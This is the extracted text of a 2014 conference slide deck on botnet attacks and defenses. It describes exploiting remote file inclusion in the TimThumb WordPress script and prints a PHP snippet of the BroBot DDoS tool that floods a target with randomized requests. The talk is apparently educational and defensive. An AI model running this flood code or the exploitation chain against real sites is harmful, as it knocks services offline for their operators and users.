30 1 Presentation by Terrence OConnor to CarolinaCon May 17, 2014

HOW TO BUILD YOUR OWN BOTNET!

WAIT, I PROBABLY CANT SAY THAT.
HOW TO DEFEND AGAINST BOTNETS!
Presenter: Terrence OConnor
30 2 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
INTRODUCTION
Terrence OConnor - CISSP, CISA, GPEN, C|EH
Global Enterprise Security Architect
Akamai Security Center of Excellence
Based in Atlanta, GA - USA
Over 14 years of security expertise.
Prior role as Global Security Architecture for Travelport
Worked in many verticals including, commerce, !nancial, enterprise, travel and media.
30 3 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
AGENDA
Security
Threat Brie!ng
Attack Tools and Techniques
Live RFI and DDoS Attacks
Summary
Q&A
30 4 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Security Concepts
The Super Condensed Version
30 5 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
MOTIVATION
Attacker motivations fall into categories:
Political Attack those that dont agree with
their beliefs.
Financial There is some !nancial gain to be
had by attacking.
Glory They attack for recognition of their
prowess.
Or Its Tuesday and they are bored

Attack impacts:
Data Loss
Service Interruption
Fraud





Attack methods:
Resource Consumption Attacks (DDoS)
Man-in-the-Middle (Manipulation of Data in
Transit)
Hijacking/Redirection
Application Attacks Injecting Unwanted
Behavior into Processing Logic
SQL Injection, Command Injection, etc.
The list goes on

30 6 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
LEVEL SETTING
What are your biggest security concerns and challenges with
your online presence?

30 7 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
WHAT KEEPS CISOS UP AT NIGHT?
Data Breaches
How do you mitigate against data breaches and unintentional information disclosure?
Service Availability
Either through miscon!guration (improper change control) or through Attack (DDoS)
this generally falls under the oversight of the CISO.
What is your strategy to mitigate availability attacks?
Billing Attacks
Volumetric Tra"c Flooding
Those Scaling Overages sure, well bill you for that!
Brand Protection
What is the cost of an impact to your companys Brand in terms of dollars?

30 8 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
What Ive seen
30 9 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
HEADLINES
30 10 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
BOTS NOT LIMITED TO HTTP(S)
Once your applications are compromised by a bot, they can execute
any TCP/UDP tra"c that the language/server allows.
Examples:
DNS Flood
FTP Brute-force
SSH Brute-force
NTP Re#ection/Ampli!cation
SNMP
30 11 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
BROBOT IN ACTION
30 12 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
ADVERSARIES FOLLOWING THE SAME TRENDS
Increasingly focused on the Web Application
Fraud
Web App is trusted by the Database and users of the App
Establish Pivot to target the Enterprise
DDoS has evolved to focus on the Web App in recent years
Utilization of Re#ective Services
Cloud Based Attack Adoption
Fast
Easy
Convenient
Powerful
30 13 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Why is it so easy?
30 14 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
SO MANY REMOTE FILE INCLUSION/COMMAND INJECTION VULNERABILITIES!!!
Source: http://www.exploit-db.com/
Source: http://web.nvd.nist.gov/
30 15 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
KEEP IN MIND
If, I own your box,
I own your service.
I own your customers.
I own your reputation.
30 16 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Tools and Techniques
30 17 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
HIGH LEVEL DEMO OVERVIEW
Attacker
1) Recon/Mapping to find Application with known vulnerability
Not covered in the Demo, because Exploitation is more interesting
Hint: Google is a big help!
2) Exploit RFI vulnerability to run attack controlled code on Server
In this case, code is BroBot DDoS
3) Launch DDoS targeting the Open cart Site from our new Server
30 18 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
THE SCENARIO
Vulnerable Blog (and consequently, our Bot):
Fully Patched and Updated WordPress
Well-connected
Cloud Hosted
Unprotected Site:
Cloud Hosted
Site with network layer protections, but nothing more.
Protected Site:
Patent Pending Technology
Protects Form Submissions from Bots
30 19 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
WORDPRESS FULLY PATCHED
Some stats:
Powers 1/6 of all sites on the internet.
Thats ~70,900,000 sites at last count.
Many disparate hosting providers.
Thousands of Custom Themes
Joomla! has very similar issues
30 20 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
THEME TIMTHUMB DROP-IN
A small php script for cropping, zooming and resizing web images
(jpg, png, gif). Perfect for use on blogs and other applications. - OH
NO!
Developed for use in the WordPress theme Mimbo Pro, and since
used in many other WordPress themes.
Pulls remote !les locally
Not a lot of input checking
Requires !le to be local prior to content veri!cation
No default security mechanisms
Note: I am using an older version, thats still out there on MANY
blogs
30 21 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
BAD SCRIPT SERVER - BROBOT
Used primarily by QCF and Us
Very Simple Script
Easily Uploaded
Easily Executed
Creates Massive Tra"c and CPU Load on Attacked Servers
30 22 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
BROBOT CODE SNIPPET
function curl_download ($remote){

$useragent = array('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.16) Gecko/20110929 Iceweasel/3.5.16','IE/5.0
(compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 1.1.4322;)','GoogleSub/2.1 ( http://
www.googleSub.com/Sub.html)','msnSub-Products/1.0 (+http://search.msn.com/msnSub.htm)','Opera/9.00 (Windows NT 5.1; U;
en)','Safari/5.00 (Macintosh; U; en)');

$cp = curl_init($remote);
curl_setopt($cp, CURLOPT_FILE, tempnam('',''));
curl_setopt($cp, CURLOPT_USERAGENT,$useragent[rand(0,count($useragent)-1)]);
curl_setopt($cp, CURLOPT_HTTPHEADER,array("Cache-Control: no-cache",""));
curl_setopt($cp, CURLOPT_HEADER, 0);
curl_setopt($cp, CURLOPT_RETURNTRANSFER, 1);
curl_exec($cp);
curl_close($cp);
}

if(function_exists(curl_init)){
for($i = 0;$i < 10000;$i++){
curl_download($target."?".rand(0,3000)/3.33334444);
}
}
30 23 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Attack
Its really easy.
30 24 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Defense
Its really hard.
30 25 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
PROTECTIONS
Must have Protection on Application Layer Attacks at Global Scale
Real-time Always-on Security Seconds Matter!
Protecting Multiple Origins from Attack with one Solution
Bot Mitigation must be Cacheable
Make Inputs Harder to Guess
Block Bad Inputs
30 26 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Bot Mitigation
Techniques
30 27 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Recap
30 28 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
SUMMARY
Attacks are easily executed on a large scale
Including DNS, HTTP(S), Data Ex!ltration, etc.

Targets are in all verticals and of all sizes
Operating on the internet means constant automated attack
Are you the lowest hanging fruit?

Prepare, Protect, Monitor
30 29 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
MORE INFO
30 30 Presentation by Terrence OConnor to CarolinaCon May 17, 2014
Q&A
?
Presenter
Terrence OConnor
terrence.oconnor (at) gmail dot com
Senior Enterprise Security Architect